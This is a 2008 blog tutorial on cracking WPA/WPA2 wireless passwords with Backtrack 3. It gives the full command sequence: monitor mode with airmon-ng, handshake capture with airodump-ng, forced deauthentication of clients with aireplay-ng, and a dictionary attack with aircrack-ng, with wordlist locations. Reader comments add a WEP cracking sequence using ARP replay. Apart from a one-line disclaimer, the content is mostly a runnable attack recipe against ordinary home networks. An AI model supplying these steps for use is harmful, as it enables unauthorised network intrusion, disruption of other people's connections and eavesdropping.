Saturday, December 27, 2008

Hacking WPA/WPA2 with Backtrack 3

WPA is an encryption scheme designed to secure the wireless network of your home or office from intruders and eavesdroppers. It is reportedly safer than WEP. There have been numerous attempts to break WEP and WPA encryption with mixed results. This tutorial discusses currently available techniques for testing the wireless network security. Be aware that breaking into your neighbor's network without permission is wrong.



What You Need


To test security of wireless networks, you can use the live CD Linux distribution called Backtrack. You can download its latest ISO image from Remote-Exploit.org and burn it with any CD burner program like InfraRecorder or CDBurnerXP. Alternatively, you can try the SliTaz Aircrack-NG distribution which is lighter and simpler than Backtrack.


Here's a list of what you need to crack WPA/WPA2:




Reboot your computer with a Backtrack CD and you'll be presented with the KDE environment.



Surveying Wireless Networks with Kismet


Launch Konsole which is located right next to the KDE Start menu. Open /usr/local/etc/kismet.conf in a text editor and edit the source= line to include your wireless device. For example, for Broadcom 43xx based card, put source=bcm43xx,eth1,bcm43xx. Refer to Kismet documentation section 12. Save kismet.conf and start kismet.


Once kismet starts detecting wireless networks around, press s and P to sort the network list by packet counts in descending order. Press Up or Down key to move to the target network and press i for network information or c for client list. Write down such information as:



  • ESSID (wireless network name)
  • BSSID (MAC address of access point)
  • channel of wireless network
  • MAC address of clients

Press x to close popup windows and Q to exit Kismet.

Brute-Force Dictionary Attack



This is the classic brute-force attack.


airmon-ng stop wlan0

airmon-ng start wlan0

The commands above put your wireless device in monitor mode. The monitor mode is the mode whereby your wireless card can listen to wireless traffic passively. Replace wlan0 with your wireless device name, such as eth1. Type iwconfig to make sure your card is in monitor mode.


airodump-ng -w test wlan0

Skip the step above if you used Kismet as in the previous section. Here airodump-ng is used to survey the wi-fi networks. Press Ctrl+C to stop airodump-ng. Copy BSSID (MAC address) of the target network.


airodump-ng -w logfile -c 3 --bssid A0:B1:C2:D3:E4:F5 wlan0

Sniff and log the target network (specified with --bssid option) on the specified channel (-c option) to the specified log file (-w option). Wait until WPA Handshake message appears on the screen. Then, stop airodump-ng by pressing Ctrl+C.


Optionally, if you see a client connected to the target network but no authentication handshake, then you can deauthenticate the client by running the following example command in a separate terminal:



aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0


where -a option specifies the access point and -c option specifies the client to deauthenticate. Hopefully, the command above will trick the client to renegotiate a 4-way authentication handshake with the access point. Otherwise, you'll have to wait until a handshake message shows up on airodump-ng outpout.

zcat /pentest/password/pico/cowpatty/final-wordlist.txt.gz > /tmp/wordlist.txt

aircrack-ng -a 2 -w /tmp/wordlist.txt logfile*.cap


Begin a brute-force dictionary attack using the saved log file(s) and the specified dictionary (-w option). Aircrack-ng will try every word in the dictionary until the correct passphrase is found. It may take hours or several days depending on the size of dictionary and the speed of your CPU to try every word in the dictionary. However, if the passphrase is not found in the dictionary or made up of random alphanumeric characters, then you are out of luck and just wasting your time. In this case, the dictionary attack won't be any good.



Finding a Good Dictionary


You need a good dictionary to crack WPA. Backtract 3 CD has wordlist files at the following locations:


/usr/local/john-1.7.2/password.lst

/pentest/fuzzers/spike/src/password.lst

/pentest/fuzzers/spike/src/wordlist

/pentest/password/pico/cowpatty/final-wordlist.txt.gz

/pentest/wireless/aircrack-ng/test/password.lst

/pentest/wireless/eapmd5pass/sample-wordlist.txt

/opt/windows-binaries/wordlist.txt.gz

Also, aircrack FAQ page has an extensive list of places where you can download good wordlists from. In addition, I found a good wordlist called 9-final-wordlist.zip here.



Further Readings


3 comments:

  1. rummit banget mas.......ada yang lebih bagus....tinggal

    *airmon-ng stop (device)
    *airmon-ng start (device)
    *arodump-ng (device)

    nahhh abis itu kular deh mac nya client....tinggal pilih salah satu yang paling banyak ngirimin packet data.....

    *airodump-ng --channel (channel AP) --bssid (mac AP) -w hasil (device)

    trus kalo mw dapet packet lebih cepat lagi pake yang....

    *aireplay-ng --arpreplay -b (mac AP) -h (mac client) (device)

    tuhh kalo saya cuman gitu tuh.....

    kalo yg masalah deauth nggk usah jga nggk papa....yang peting udah nge replay.....

    nahhh yang kita tunggu 2 tuh wep nya.....

    langsung ajah ....tulis di terminal....

    *aircrack-ng hasil*.cap


    NB: selain itu jga masih ada tools yg bagus....kalo di backtrack ituh ada yang nama nya spoon wep.....lebih enak di pake....tinggal make cursor doank...kalo aircrack-ng khan harus ngetik dulu.....

    (thanks to ALLAH SWT).....

    kalo mw liat blog saya silahkan aja....

    (http://tutorial-windows-linux.blogspot.com/)

    (http://esemkha.blogspot.com/)

    ReplyDelete
  2. Hi..

    Thanks for your wordlist. I have d/l it and extracted it but I do not know how to access to the wordlist when I'm running on VMWare Linux.

    I have searched the aircrack FAQ, but they provide links to wordlist but I have no idea how to run them on Linux.

    Greatly appreciate if you could help me..

    Thanks in advance..

    ReplyDelete
  3. Try to mount the disk partition you saved your wordlist onto, then use it:

    In konsole, type something like:

    mount -t ntfs-3g -o ro /dev/sda1 /mnt

    Then, to use the wordlist with aircrack-ng:

    aircrack-ng -a 2 -w /mnt/path/to/wordlist.txt *.cap

    ReplyDelete

About This Blog

KBlog logo This blog seeks to provide a collection of interesting pictures found on the Web. Thanks for visiting the blog and posting your comments.

© Contents by KBlog

© Blogger template by Emporium Digital 2008

Followers

Total Pageviews

Powered By Blogger